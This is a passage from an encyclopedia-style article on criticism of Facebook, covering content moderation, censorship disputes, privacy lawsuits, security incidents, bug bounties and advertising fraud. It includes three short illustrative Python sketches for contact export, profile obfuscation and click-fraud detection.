In June 2017, Facebook published a blog post offering insights into how it detects and combats terrorism content. The company claimed that the majority of the terrorism accounts that are found are discovered by Facebook itself, that it reviews reports of terrorism content "urgently", and that, in cases of imminent harm, it will "promptly inform authorities". It also develops new tools to aid in its efforts, including the use of artificial intelligence to match terrorist images and videos, detecting when content is shared across related accounts, and developing technologies to stop repeat offenders. The company stated that it has 150 people dedicated to terrorism countermeasures, and works with governments and industries in an effort to curb terrorist propaganda. Its blog post stated that "We want Facebook to be a hostile place for terrorists."[341][342]

Employee data leak

In June 2017, The Guardian reported that a software bug had exposed the personal details of 1,000 Facebook workers involved in reviewing and removing terrorism content, by displaying their profiles in the "Activity" logs of Facebook groups related to terrorism efforts. In Facebook's Dublin, Ireland headquarters, six individuals were determined to be "high priority" victims of the error, after the company concluded that their profiles were likely viewed by potential terrorists in groups such as ISIS, Hezbollah and the Kurdistan Workers' Party. The bug itself, discovered in November 2016 and fixed two weeks later, was active for one month, and had also been retroactively exposing censored personal accounts from August 2016. One affected worker fled Ireland, went into hiding, and only returned to Ireland after five months due to a lack of money. Suffering from psychological distress, he filed a legal claim against Facebook and CPL Resources, an outsourcing company, seeking compensation. A Facebook spokesperson stated that "Our investigation found that only a small fraction of the names were likely viewed, and we never had evidence of any threat to the people impacted or their families as a result of this matter", and Craig D'Souza, Facebook's head of global investigations, said: "Keep in mind that when the person sees your name on the list, it was in their activity log, which contains a lot of information [...] there is a good chance that they associate you with another admin of the group or a hacker". Facebook offered to install a home-alarm monitoring system, provide transport to and from work, and provide counseling through its employee assistance program. As a result of the data leak, Facebook is reportedly testing the use of alternative, administrative accounts for workers reviewing content, rather than requiring workers to sign in with their personal profiles.[343][344]

On October 26, 2018, Facebook announced that it had deleted 82 accounts created in Iran that included posts on contentious topics such as race, immigration, and U.S. President Donald Trump.[345]

Fake news

Facebook has been criticized for not doing enough to limit the spread of fake news stories on its site, especially after the 2016 United States presidential election, which some have claimed Donald Trump would not have won if Facebook had not helped spread what they claim to have been fake stories that were biased in his favor.[346] Mark Zuckerberg has begun to take steps to eliminate the prevalence of fake news on Facebook as a result of criticism of Facebook's influence on the presidential election.[347] At a conference called Techonomy, Zuckerberg stated in regard to Donald Trump: "There's a profound lack of empathy in asserting that the only reason why someone could have voted the way that they did is because they saw some fake news". Zuckerberg affirmed the idea that people do not stray from their own ideals and political leanings, stating, "I don't know what to do about that" and, "When we started, the north star for us was: We're building a safe community".[348]

Zuckerberg has also been quoted in his own Facebook post: "Of all the content on Facebook, more than 99 percent of what people see is authentic".[349] In addition, the Pew Research Center stated that "62% of Americans obtain some, or all, of their news on social media - the bulk of it from Facebook".[350] A former editor at Facebook leaked inflammatory information about the website's algorithms, pointing to certain falsehoods and bias in the news created within Facebook. Although Facebook initially denied claims of issues with fake news stories and its algorithms, it fired the entire trending team involved with a fake news story that claimed Megyn Kelly was a "closeted liberal".[351]

Incitement of violence in Sri Lanka

Sri Lankan telecommunications minister Harin Fernando stated that Facebook had been too slow removing content and banning users who were using its platforms to facilitate violence during the 2018 anti-Muslim riots in Sri Lanka.[352][353] Facebook stated that it is increasing the number of Sinhalese-speakers it employs to review content.[352]

Myanmar abuses

Facebook removed accounts owned by the Myanmar Armed Forces for inciting hatred against the Rohingya people,[354][355][356] and “engaging in coordinated inauthentic behavior.”[357]

Blue tick

Facebook grants a blue tick (verification badge) to the accounts of public personalities, brands, and celebrities (including politicians and artists). It has no policy for cases in which an individual with a verified blue tick account is convicted in a serious criminal case. In one case in India, a politician was convicted and sentenced to 10 years in jail in a serious bribery case, yet his Facebook page still continues to be verified.[358]

Neo-Nazi and white supremacist content

From c.2018 until 27 March 2019, Facebook's internal policy was to permit "white nationalist" content but not "white supremacist" content, despite advice stating there is no distinction.[359] In practice, it hosted much white supremacist and neo-Nazi content.[360] On 27 March 2019, Facebook backtracked and stated that white nationalism "cannot be meaningfully separated from white supremacy and organized hate groups".[359]

Technical

Real-name policy controversy and compromise

Facebook has a real-name system policy for user profiles. The real-name policy stems from the position "that way, you always know who you're connecting with. This helps keep our community safe."[16] The real-name system does not allow adopted names or pseudonyms,[361] and in its enforcement has suspended accounts of legitimate users, until the user provides identification indicating the name.[362] Facebook representatives have described these incidents as very rare.[362] A user claimed responsibility via the anonymous Android and iOS app Secret for reporting "fake names" which caused user profiles to be suspended, specifically targeting the stage names of drag queens.[363] On October 1, 2014, Chris Cox, Chief Product Officer at Facebook, offered an apology: "In the two weeks since the real-name policy issues surfaced, we've had the chance to hear from many of you in these communities and understand the policy more clearly as you experience it. We've also come to understand how painful this has been. We owe you a better service and a better experience using Facebook, and we're going to fix the way this policy gets handled so everyone affected here can go back to using Facebook as you were."[364]

On December 15, 2015, Facebook announced in a press release[365] that it would be providing a compromise to its real-name policy after protests from groups such as the gay/lesbian community and abuse victims.[366] The site said it was developing a protocol that would allow members to provide specifics as to their "special circumstance" or "unique situation", with a request to use pseudonyms, subject to verification of their true identities. At that time, this was already being tested in the U.S. Product manager Todd Gage and vice president of global operations Justin Osofsky also promised a new method for reducing the number of members who must go through ID verification while ensuring the safety of others on Facebook. The fake-name reporting procedure will also be modified, forcing anyone who makes such an allegation to provide specifics that would be investigated and giving the accused individual time to dispute the allegation.[367]

Deleting users' statuses

There have been complaints of user statuses being mistakenly or intentionally deleted for alleged violations of Facebook's posting guidelines. Especially for non-English-speaking writers, Facebook does not have a proper support system to genuinely read the content and make decisions. Sometimes the content of a status contained no "abusive" or defamatory language, but it was nevertheless deleted on the basis that it had been secretly reported by a group of people as "offensive". For languages other than English, Facebook is still unable to identify this kind of coordinated group reporting, which has been used to vilify humanitarian activism. In another incident, Facebook had to apologize after it deleted a free-speech group's post about the abuse of human rights in Syria. In that case, a spokesman for Facebook said the post was "mistakenly" removed by a member of its moderation team, which receives a high volume of take-down requests.[368]

Enabling of harassment

Facebook instituted a policy by which it is now self-policed by the community of Facebook users. Some users have complained that this policy allows Facebook to empower abusive users to harass them by submitting reports on even benign comments and photos as being "offensive" or "in violation of Facebook Rights and Responsibilities", and that enough of these reports result in the harassed user's account being blocked for a predetermined number of days or weeks, or even deactivated entirely.[369]

Facebook UK policy director Simon Milner told Wired Magazine that "Once the piece of content has been seen, assessed and deemed OK, (Facebook) will ignore further reports about it."[370]

Lack of customer support

Facebook lacks live support, making it difficult to resolve issues that require the services of an administrator or are not covered in the FAQs, such as the enabling of a disabled account. The automated emailing system used when filling out a support form often refers users back to the help center or to pages that are outdated and cannot be accessed, leaving users at a dead end with no further support available. Furthermore, a person who has lost access to Facebook has no easy way to find an email address through which to contact the company regarding an account deletion.[371]

Downtime and outages

Facebook has had a number of outages and periods of downtime large enough to draw some media attention. A 2007 outage resulted in a security hole that enabled some users to read other users' personal mail.[372] In 2008, the site was inaccessible for about a day, from many locations in many countries.[373] In spite of these occurrences, a report issued by Pingdom found that Facebook had less downtime in 2008 than most social-networking websites.[374] On September 16, 2009, Facebook started having major problems with loading when people signed in. On September 18, 2009, Facebook went down for the second time in 2009; the first outage occurred when a group of hackers deliberately tried to drown out a political speaker who had been continuously speaking against the Iranian election results, causing problems for the social networks he used.[375]

In October 2009, an unspecified number of Facebook users were unable to access their accounts for over three weeks.[376][377][378][379]

Tracking cookies

Facebook has been criticized heavily for 'tracking' users, even when they are logged out of the site. Australian technologist Nik Cubrilovic discovered that when a user logs out of Facebook, the cookies from that login are still kept in the browser, allowing Facebook to track users on websites that include "social widgets" distributed by the social network. Facebook has denied the claims, saying it has 'no interest' in tracking users or their activity. After the discovery of the cookies, it also promised to remove them, saying it would no longer have them on the site. A group of users in the United States has sued Facebook for breaching privacy laws.[380]

As of December 2015, to comply with a court order citing violations of the European Union Directive on Privacy and Electronic Communications, which requires users to consent to tracking and storage of data by websites, Facebook no longer allows users in Belgium to view any content on the service, even public pages, without being registered and logged in.[381]

Email address change

In June 2012, Facebook removed all existing email addresses from user profiles and added a new @facebook.com email address. Facebook claimed this was part of adding a "new setting that gives people the choice to decide which addresses they want to show on their timelines". However, this setting was redundant to the existing "Only Me" privacy setting, which was already available to hide addresses from timelines. Users complained that the change was unnecessary, that they did not want an @facebook.com email address, and that they did not receive adequate notification that their profiles had been changed.[382] The change in email address was synchronized to phones due to a software bug, causing existing email address details to be deleted.[383] The facebook.com email service was retired in February 2014.[384]

Safety Check bug

On March 27, 2016, following a bombing in Lahore, Pakistan, Facebook activated its "Safety Check" feature, which allows people to let friends and loved ones know they are okay following a crisis or natural disaster, for people who were never in danger or even close to the Pakistan explosion. Some users as far away as the US, UK and Egypt received notifications asking if they were okay.[385][386]

Censorship

The warning box that appears when Internet users try to view censored or blocked content on Facebook

Search function

Facebook's search function has been accused of preventing users from searching for certain terms. Michael Arrington of TechCrunch has written about Facebook's possible censorship of "Ron Paul" as a search term. MoveOn.org's Facebook group for organizing protests against privacy violations could for a time not be found by searching. The very word privacy was also restricted.[387]

Censorship of conservative news

In May 2016, Facebook was accused by a former employee of leaving conservative topics out of the trending bar.[388] Although Facebook denied these allegations, the site planned to improve the trending bar.[389]

In August 2018, Facebook deleted videos posted to it by PragerU. Facebook later reversed its decision and restored the PragerU content, saying that the content had been falsely reported as containing hate speech.[390][391]

As a result of the perception that conservatives are not treated neutrally on Facebook, alternative social media platforms have been established.[392] This perception has led to a reduction of trust in Facebook, and reduced usage by those who consider themselves to be conservative.[393]

In July 2020, Congressman Matt Gaetz filed a criminal referral against Facebook, citing evidence produced by Project Veritas that he said demonstrated that Facebook CEO Mark Zuckerberg had made materially false statements to Congress while under oath in hearings in April 2018.[394][395] Gaetz claimed that the evidence showed that Zuckerberg's claims that the website did not engage in bias against conservative speech were false.[394]

Competing social networks

In October 2018, Facebook and Facebook Messenger were said to be blocking URLs to minds.com, a social network website that is a competitor of Facebook.[396] Users have complained that Facebook marks links to the competitor as "insecure" and requires them to complete a captcha to share such links with other users. In 2015, Facebook was accused of banning rival network Tsu.co in a similar manner.[397]

Content critical of Facebook

Newspapers regularly report stories of users who claim they've been censored on Facebook for being critical of Facebook itself, with their posts removed or made less visible. Examples include Elizabeth Warren in 2019[398] and Rotem Shtarkman in 2016.[399]

Facebook has systems to monitor specific terms and keywords and trigger automatic or semi-automatic action.[400] In the context of media reports[401] and lawsuits[402] from people formerly working on Facebook content moderation, a former employee has claimed that specific rules existed to monitor, and sometimes target, posts that are anti-Facebook or that criticize Facebook for some action, for instance by matching the keywords "Facebook" or "DeleteFacebook".

Image censorship

Facebook has a policy of removing photos which they believe violate the terms and conditions of the website. Images have been removed from user pages on topics such as breastfeeding,[403] nudes in art, apparent breasts, naked mannequins,[404] kisses between persons of the same sex and family photos.[405]

In September 2016, Norwegian author Tom Egeland published Nick Ut's iconic "napalm girl" photo on his Facebook page. He was banned for publishing "a picture of a nude child". A few weeks later, the newspaper Aftenposten published an open letter to Zuckerberg after the banning of the photograph, a Pulitzer Prize-winning documentary image from the Vietnam War.[406] Half of the ministers in the Norwegian government shared the famous photo on their Facebook pages, among them Prime Minister Erna Solberg of the Conservative Party (Høyre). But after only a few hours, several of the Facebook posts, including the Prime Minister's, were deleted by Facebook.[407]

As a reaction to the letter, Facebook reconsidered its opinion on this picture and republished it, recognizing "the history and global importance of this image in documenting a particular moment in time".[408]

Breastfeeding photos

Facebook has been repeatedly criticized for removing photos uploaded by mothers breastfeeding their babies.[409] Facebook has maintained that photos showing an exposed breast violate its decency code even when the baby covered the nipple; at the same time, it took several days to respond to criticism and deactivate a paid advertisement for a dating service that used a photo of a topless model.[410]

The breastfeeding photo controversy continued following public protests and the growth in membership of a Facebook group titled "Hey, Facebook, breastfeeding is not obscene! (Official petition to Facebook)."[409] In December 2011, Facebook removed photos of mothers breastfeeding and, after public criticism, restored the photos. The company said it removed the photos it believed violated the pornographic rules in the company's terms and conditions.[410] During February 2012, the company renewed its policy of removing photos of mothers breastfeeding. Founders of the Facebook group "Respect the Breast" reported that "women say they are tired of people lashing out at what is natural and what they believe is healthy for their children."[411]

Censorship of editorial content

On February 4, 2010, a number of Facebook groups against the Democratic Alliance for the Betterment and Progress of Hong Kong (DAB) were removed without any reason given.[412] The DAB is one of the largest pro-Beijing political parties in Hong Kong. The affected groups have since been restored.

Censorship of the word "moskal"

Around July 1, 2015, Facebook started to automatically ban accounts that used the word "moskal", a widely used historical slang term for people of Russia (whose state was known as Moskovia until 1721) that may be seen as offensive by some individuals. However, the use of similar words such as "khokhol", which is widely used by Russian nationalists against Ukrainians, as well as insulting uses of "ukrop" (literally "dill"), was not penalized. In an experiment, journalist Max Kononenko posted the poem "Моя родословная" ("My Genealogy") by Alexander Pushkin, only for his account to be banned automatically within minutes.[413] Posts by Max Ksenzov, deputy head of Roskomnadzor, were similarly automatically deleted.[414][415][416] Ksenzov accused Facebook of censorship and double standards and removed his account in protest.

Censorship on the Kashmir Freedom Movement

In 2016, Facebook banned and also removed content regarding the Kashmir dispute, triggering a response from The Guardian, BBC and other media groups regarding its censorship policies.[417][418] Facebook's censorship policies have been criticized especially after the company banned posts about the Indian army's attack on protesters, including children, with pellet guns.[419] In response, a human rights group superimposed pellet injuries, similar to those inflicted on Kashmiri people, onto the faces of popular Indian actors and other famous people, including Facebook founder Mark Zuckerberg and even Prime Minister Narendra Modi; the campaign went viral.[420][421]

Kurdish opposition censorship

Facebook has a policy to censor anything related to Kurdish opposition against Turkey, such as maps of Kurdistan, flags of Kurdish armed groups (such as PKK and YPG), and criticism of Mustafa Kemal Atatürk, the founder of Turkey.[422][423]

Censorship of 'blasphemous' content

Facebook has worked with the Pakistani government to censor 'blasphemous' pages and speech inside Pakistan.[424]

Censorship of anti-immigrant speech

In Germany, Facebook actively censors anti-immigrant speech.[425][426][427]

In May 2016, Facebook and other technology companies agreed to a new "code of conduct" by the European Commission to review hateful online content within 24 hours of being notified, and subsequently remove such content if necessary.[428][429][430] A year later, Reuters reported that the European Union had approved proposals to make Facebook and other technology companies tackle hate speech content on their platforms, but that a final agreement in the European Parliament is needed to make the proposals into law.[431][432] In June 2017, the European Commission praised Facebook's efforts in fighting hateful content, having reviewed "nearly 58 percent of flagged content within 24 hours".[433][434]

Third-party responses to Facebook

Government censorship

Several countries have banned access to Facebook, including Syria,[435] China,[436] and Iran.[437] In 2010, the Office of the Data Protection Supervisor, a branch of the government of the Isle of Man, received so many complaints about Facebook that it deemed it necessary to provide a "Facebook Guidance" booklet (available online as a PDF file), which cited (amongst other things) Facebook policies and guidelines and included an elusive Facebook telephone number. When called, however, this number provided no telephone support for Facebook users and only played back a recorded message advising callers to review Facebook's online help information.[438]

In 2010, Facebook reportedly allowed an objectionable page, deemed by the Islamic Lawyers Forum (ILF) to be anti-Muslim, to remain on the site. The ILF filed a petition with Pakistan's Lahore High Court. On May 18, 2010, Justice Ijaz Ahmad Chaudhry ordered Pakistan's Telecommunication Authority to block access to Facebook until May 31. The offensive page had provoked street demonstrations in Muslim countries due to visual depictions of Prophet Mohammed, which are regarded as blasphemous by Muslims.[439][440] A spokesman said the Pakistan Telecommunication Authority would move to implement the ban once the order had been issued by the Ministry of Information and Technology. "We will implement the order as soon as we get the instructions", Khurram Mehran told AFP. "We have already blocked the URL link and issued instruction to Internet service providers yesterday", he added. Rai Bashir told AFP that "We moved the petition in the wake of widespread resentment in the Muslim community against the Facebook contents". The petition called on the government of Pakistan to lodge a strong protest with the owners of Facebook, he added. Bashir said a PTA official told the judge his organization had blocked the page, but the court ordered a total ban on the site. People demonstrated outside the court in the eastern city of Lahore, carrying banners condemning Facebook. Larger-scale protests took place in Pakistan after the ban and the widespread news of the objectionable page. The ban was lifted on May 31 after Facebook reportedly assured the Lahore High Court that it would remedy the issues in dispute.[441][442][443]

In 2011, a court in Pakistan was petitioned to place a permanent ban on Facebook for hosting a page called "2nd Annual Draw Muhammad Day May 20th 2011".[444][445]

Organizations blocking access

Ontario government employees, federal public servants, MPPs, and cabinet ministers were blocked from access to Facebook on government computers in May 2007.[446] When employees tried to access Facebook, a warning message appeared: "The Internet website that you have requested has been deemed unacceptable for use for government business purposes". This warning also appears when employees try to access YouTube, MySpace, gambling or pornographic websites.[447] However, innovative employees have found ways around such protocols, and many claim to use the site for political or work-related purposes.[448]

A number of local governments including those in the UK[449] and Finland[450] imposed restrictions on the use of Facebook in the workplace due to the technical strain incurred. Other government-related agencies, such as the US Marine Corps have imposed similar restrictions.[451] A number of hospitals in Finland have also restricted Facebook use citing privacy concerns.[452][453]

Schools blocking access

The University of New Mexico (UNM) in October 2005 blocked access to Facebook from UNM campus computers and networks, citing unsolicited emails and a similar site called UNM Facebook.[454] After a UNM user signed into Facebook from off campus, a message from Facebook said, "We are working with the UNM administration to lift the block and have explained that it was instituted based on erroneous information, but they have not yet committed to restore your access." UNM, in a message to students who tried to access the site from the UNM network, wrote, "This site is temporarily unavailable while UNM and the site owners work out procedural issues. The site is in violation of UNM's Acceptable Computer Use Policy for abusing computing resources (e.g., spamming, trademark infringement, etc.). The site forces use of UNM credentials (e.g., NetID or email address) for non-UNM business." However, after Facebook created an encrypted login and displayed a precautionary message not to use university passwords for access, UNM unblocked access the following spring semester.[455]

The Columbus Dispatch reported on June 22, 2006, that Kent State University's athletic director had planned to ban the use of Facebook by athletes and gave them until August 1 to delete their accounts.[456] On July 5, 2006, the Daily Kent Stater reported that the director reversed the decision after reviewing the privacy settings of Facebook.

Closed social networks

Several websites concerned with social networking, such as Plugtodo.com and Salesforce.com, have criticized how little information users receive about what happens when they share data. Even advanced users cannot limit the amount of information anyone can access through their profiles, while Facebook promotes the sharing of personal information for marketing purposes; the service is thus promoted using personal data from users who are not fully aware of this. Facebook exposes personal data without supporting open standards for data interchange.[457] According to several communities[458] and authors,[459] closed social networking, by contrast, allows data retrieval from other people while not exposing one's own personal information.

Openbook was established in early 2010 both as a parody of Facebook and a critique of its changing privacy management protocols.[460]

Litigation

Terms of use controversy

Facebook changed its terms of use[461] (also called its terms of service) on February 4, 2009, but the changes went unnoticed until Chris Walters, a blogger for the consumer-oriented blog The Consumerist, spotted them on February 15, 2009.[462] Walters complained that the change gave Facebook the right to "Do anything they want with your content. Forever."[463] The section that drew the most controversy was the "User Content Posted on the Site" clause. Before the changes, the clause read:

You may remove your User Content from the Site at any time. If you choose to remove your User Content, the license granted above will automatically expire, however you acknowledge that the Company may retain archived copies of your User Content.[461]

The "license granted" refers to the license that Facebook has to one's "name, likeness, and image" to use in promotions and external advertising.[461] The new terms of use deleted the phrase that states the license would "automatically expire" if a user chose to remove content. By omitting this line, Facebook license extends to adopt users' content perpetually and irrevocably years after the content has been deleted.[462]

Many Facebook users voiced objections to the changes to the terms of use, prompting an Internet-wide debate over the ownership of content. The Electronic Privacy Information Center (EPIC) prepared a formal complaint to the Federal Trade Commission. Many individuals were frustrated by the removal of the controversial clause. More than 38,000 Facebook users joined a group against the changes, and a number of blogs and news sites wrote about the issue.[462]

After Walters's blog entry brought the change to light, Zuckerberg addressed the concerns in a blog post of his own on February 16, 2009. Zuckerberg wrote, "Our philosophy is that people own their information and control who they share it with."[464] In the same post, Zuckerberg described the paradox that arises when people want to share their information (phone number, pictures, email address, etc.) with the public yet at the same time want to remain in complete control of who has access to it.[465]

To calm the criticism, Facebook returned to its original terms of use. On February 17, 2009, Zuckerberg wrote in his blog that although Facebook had reverted to the original terms, it was developing new terms to address the paradox. Zuckerberg stated that the new terms would allow Facebook users to "share and control their information, and it will be written clearly in language everyone can understand." Zuckerberg invited users to join a group entitled "Facebook Bill of Rights and Responsibilities" to give their input and help shape the new terms.

On February 26, 2009, Zuckerberg posted a blog entry updating users on the progress of the new terms of use. He wrote, "We decided we needed to do things differently and so we're going to develop new policies that will govern our system from the ground up in an open and transparent way." Zuckerberg introduced two new additions to Facebook: the Facebook Principles[466] and the Statement of Rights and Responsibilities.[467] Both allow users to vote on changes to the terms of use before they are officially released. Because "Facebook is still in the business of introducing new and therefore potentially disruptive technologies", Zuckerberg explained, users need to adjust and familiarize themselves with the products before they can adequately show their support.[468]

The new voting system was initially applauded as a step toward a more democratized social network.[469] However, the new terms were harshly criticized in a report by computer scientists from the University of Cambridge, who stated that the democratic process surrounding them was disingenuous and that significant problems remained.[470] The report was endorsed by the Open Rights Group.[471]

In December 2009, EPIC and a number of other U.S. privacy organizations filed another complaint[472] with the Federal Trade Commission (FTC) regarding Facebook's terms of service. In January 2011, EPIC filed a subsequent complaint[473] claiming that Facebook's new policy of sharing users' home addresses and mobile phone information with third-party developers was "misleading and fail[ed] to provide users clear and privacy protections", particularly for children under age 18.[474] Facebook temporarily suspended implementation of the policy in February 2011, but the following month announced it was "actively considering" reinstating it.[475]

Interoperability and data portability

Facebook has been criticized for failing to offer users a feature to export their friends' information, such as contact details, for use with other services or software. Users' inability to export their social graph in an open standard format contributes to vendor lock-in and contravenes the principles of data portability.[476] Automated collection of user information without Facebook's consent violates its Statement of Rights and Responsibilities,[477] and third-party attempts to do so (e.g., web scraping) have resulted in litigation, as in the case involving Power.com.
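
As an illustration of what portability in an open standard could look like, the sketch below serializes a contact list to the vCard format, which most address-book software can import. It is a minimal, hypothetical example: the input dictionaries and field names are invented and do not correspond to any Facebook export or API.

    # Minimal sketch: exporting a contact list to the open vCard 3.0 format.
    # The input structure and field names are illustrative, not any Facebook API.

    def contact_to_vcard(contact: dict) -> str:
        """Render one contact as a minimal vCard 3.0 entry."""
        lines = ["BEGIN:VCARD", "VERSION:3.0", f"FN:{contact['name']}"]
        if contact.get("email"):
            lines.append(f"EMAIL;TYPE=INTERNET:{contact['email']}")
        if contact.get("phone"):
            lines.append(f"TEL;TYPE=CELL:{contact['phone']}")
        lines.append("END:VCARD")
        return "\n".join(lines)

    def export_contacts(contacts: list, path: str) -> None:
        """Write all contacts into a single .vcf file importable by other services."""
        with open(path, "w", encoding="utf-8") as fh:
            fh.write("\n".join(contact_to_vcard(c) for c in contacts))

    if __name__ == "__main__":
        friends = [{"name": "Alice Example", "email": "alice@example.com"},
                   {"name": "Bob Example", "phone": "+1-555-0100"}]
        export_contacts(friends, "friends.vcf")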

Facebook Connect has been criticized for its lack of interoperability with OpenID.[478]

Lawsuits over privacy

Facebook's strategy of generating revenue through advertising has created controversy among its users, with some arguing that it is "a bit creepy… but it is also brilliant."[479] Some Facebook users have raised privacy concerns because they object to Facebook selling users' information to third parties. In 2012, users sued Facebook for using their pictures and information in a Facebook advertisement.[480] Facebook gathers user information by keeping track of the pages users have "liked" and of the interactions users have with their connections,[481] and then creates value from the gathered data by selling it.[481] In 2009, users also filed a lawsuit over Facebook's invasion of privacy through the Facebook Beacon system. Facebook believed that, through Beacon, people could inspire their friends to buy similar products; users, however, did not like the idea of sharing certain online purchases with their Facebook friends.[482] Users objected to Facebook's invasion of their privacy and to its sharing of that information with the wider world. Facebook users became more aware of Facebook's handling of user information in 2009, when Facebook launched its new terms of service. In those terms, Facebook acknowledges that user information may be used for some of Facebook's own purposes, such as sharing links to posted images or for its own commercials and advertisements.[483]

As Dijck argues, "the more users know about what happens to their personal data, the more inclined they are to raise objections."[481] This created a battle between Facebook and its users described as the "battle for information control."[481] Facebook users have become aware of Facebook's intentions, and people now see Facebook "as serving the interests of companies rather than its users."[484] In response to Facebook's selling of user information to third parties, concerned users have resorted to obfuscation,[485] deliberately hiding their real identities and providing Facebook with false information that makes the collected data less accurate.[485] By obfuscating information through tools such as FaceCloak, Facebook users can regain a degree of control over their personal information.[485]
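
The obfuscation idea can be illustrated with a short sketch that substitutes plausible but false attributes for the real ones, so that aggregated profiles of the user become less accurate. The field names, decoy values, and the idea that a profile is a simple dictionary are assumptions made purely for illustration; tools such as FaceCloak work differently in practice.

    # Illustrative sketch of profile obfuscation: replacing real attributes
    # with plausible decoys so that data collected about the user is less
    # accurate. All field names and values are hypothetical.
    import random

    DECOY_CITIES = ["Lisbon", "Oslo", "Auckland", "Quito"]
    DECOY_INTERESTS = ["birdwatching", "curling", "origami", "beekeeping"]

    def obfuscate_profile(profile: dict) -> dict:
        """Return a copy of the profile with sensitive fields replaced by decoys."""
        noisy = dict(profile)
        noisy["city"] = random.choice(DECOY_CITIES)
        noisy["birth_year"] = profile["birth_year"] + random.choice([-3, -1, 1, 3])
        noisy["interests"] = random.sample(DECOY_INTERESTS, k=2)
        return noisy

    real = {"city": "Chicago", "birth_year": 1990, "interests": ["jazz", "cycling"]}
    print(obfuscate_profile(real))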

Better Business Bureau review

As of December 2010, the Better Business Bureau gave Facebook an "A" rating.[486][487]

As of December 2010, the 36-month running count of complaints about Facebook logged with the Better Business Bureau was 1,136, including 101 ("Making a full refund, as the consumer requested"), 868 ("Agreeing to perform according to their contract"), 1 ("Refuse [sic] to adjust, relying on terms of agreement"), 20 ("Unassigned"), 0 ("Unanswered") and 136 ("Refusing to make an adjustment").[486]

Security

Facebook's software has proven vulnerable to likejacking. On July 28, 2010, the BBC reported that security consultant Ron Bowes used a piece of code to scan Facebook profiles and collect data from 100 million of them. The data collected had not been hidden by users' privacy settings. Bowes then published the list online. The list, which has been shared as a downloadable file, contains the URL of every searchable Facebook user's profile, along with their name and unique ID. Bowes said he published the data to highlight privacy issues, but Facebook claimed it was already public information.[488]

In early June 2013, The New York Times reported that an increase in malicious links related to the Trojan horse malware program Zeus had been identified by Eric Feinberg, founder of the advocacy group Fans Against Kounterfeit Enterprise (FAKE). Feinberg said that the links were present on popular NFL Facebook fan pages and, after contacting Facebook, was dissatisfied with the corporation's "after-the-fact approach". Feinberg called for oversight, stating, "If you really want to hack someone, the easiest place to start is a fake Facebook profile—it's so simple, it's stupid."[489]

Rewards for vulnerability reporting

On August 19, 2013, it was reported that Khalil Shreateh, a Facebook user from the Palestinian territories, had found a bug that allowed him to post material to other users' Facebook Walls. Users are not supposed to be able to post to another user's Wall unless they are an approved friend of that user. To prove his claim, Shreateh posted material to the Wall of Sarah Goodin, a friend of Facebook CEO Mark Zuckerberg. Shreateh then contacted Facebook's security team with proof of the bug, explaining in detail what was going on. Facebook has a bounty program that pays a fee of $500 or more to people who report bugs rather than exploiting them or selling them on the black market. However, instead of fixing the bug and paying Shreateh, Facebook initially told him that "this was not a bug" and dismissed him. Shreateh tried a second time to inform Facebook and was dismissed again. On the third try, Shreateh used the bug to post a message to Mark Zuckerberg's own Wall, stating "Sorry for breaking your privacy ... but a couple of days ago, I found a serious Facebook exploit" and that Facebook's security team was not taking him seriously. Within minutes, a security engineer contacted Shreateh, questioned him about how he had done it, and ultimately acknowledged that it was a bug in the system. Facebook temporarily suspended Shreateh's account and fixed the bug after several days. However, in a move that met with much public criticism and disapproval, Facebook refused to pay Shreateh the bounty, responding that by posting to Zuckerberg's account he had violated its terms of service and therefore "could not be paid." The Facebook team also strongly censured Shreateh over his manner of resolving the matter, while asking that he continue to help them find bugs.[490][491][492]

On August 22, 2013, Yahoo News reported that Marc Maiffret, chief technology officer of the cybersecurity firm BeyondTrust, was urging hackers to help raise a $10,000 reward for Khalil Shreateh. On August 20, Maiffret stated that he had already raised $9,000, including $2,000 he contributed himself. He and other hackers denounced Facebook for refusing Shreateh compensation. Maiffret said: "He is sitting there in Palestine doing this research on a five-year-old laptop that looks like it is half broken. It's something that might help him out in a big way." Facebook representatives responded, "We will not change our practice of refusing to pay rewards to researchers who have tested vulnerabilities against real users." Facebook representatives also said they had paid out over $1 million to individuals who had discovered bugs in the past.[493]

Environmental impacts

In 2010, Prineville, Oregon, was chosen as the site for Facebook's new data center.[494] However, the center has been met with criticism from environmental groups such as Greenpeace because the power utility company contracted for the center, PacifiCorp, generates 60% of its electricity from coal.[495][496][497] In September 2010, Facebook received a letter from Greenpeace containing half a million signatures asking the company to cut its ties to coal-based electricity.[498]

On April 21, 2011, Greenpeace released a report showing that of the top ten big brands in cloud computing, Facebook relied the most on coal for electricity for its data centers. At the time, data centers consumed up to 2% of all global electricity and this amount was projected to increase. Phil Radford of Greenpeace said "we are concerned that this new explosion in electricity use could lock us into old, polluting energy sources instead of the clean energy available today".[499]

On December 15, 2011, Greenpeace and Facebook announced together that Facebook would shift to use clean and renewable energy to power its own operations. Marcy Scott Lynn, of Facebook's sustainability program, said it looked forward "to a day when our primary energy sources are clean and renewable" and that the company is "working with Greenpeace and others to help bring that day closer".[500][501]

Advertising

Click fraud

In July 2012, the startup Limited Run claimed that 80% of its Facebook clicks came from bots.[502][503][504] Limited Run co-founder Tom Mango told TechCrunch that they "spent roughly a month testing this" with six web analytics services, including Google Analytics and in-house software.[502] Limited Run said it concluded that the clicks were fraudulent after running its own analysis: it determined that most of the clicks Facebook was charging it for came from computers that were not loading JavaScript, the programming language that allows web pages to be interactive. Almost all web browsers load JavaScript by default, so the assumption is that a click coming from a browser that does not is probably not from a real person but from a bot.[505]
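
The heuristic Limited Run described, that a click whose session never executes JavaScript is probably automated, can be sketched roughly as below. The log format (sets of session IDs for ad clicks and for a JavaScript beacon fired by the landing page) is an assumption for illustration, not Limited Run's actual tooling.

    # Rough sketch of the "no JavaScript executed" heuristic described above.
    # Assumes the site logs (a) every ad click with a session id and (b) every
    # JavaScript beacon fired by the landing page; the formats are hypothetical.

    def fraction_suspect_clicks(click_sessions: set, js_beacon_sessions: set) -> float:
        """Share of clicked sessions that never ran the landing page's JavaScript."""
        if not click_sessions:
            return 0.0
        no_js = click_sessions - js_beacon_sessions
        return len(no_js) / len(click_sessions)

    clicks = {"s1", "s2", "s3", "s4", "s5"}
    beacons = {"s2"}  # only one session executed the JavaScript beacon
    print(f"{fraction_suspect_clicks(clicks, beacons):.0%} of clicks look automated")

On this toy input, 80% of clicks are flagged, mirroring the proportion Limited Run reported.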

Like fraud

Facebook offers an advertising tool for pages to get more "likes".[506] According to Business Insider, this advertising tool is called "Suggested Posts" or "Suggested Pages", allowing companies to market their page to thousands of new users for as little as $50.[507]

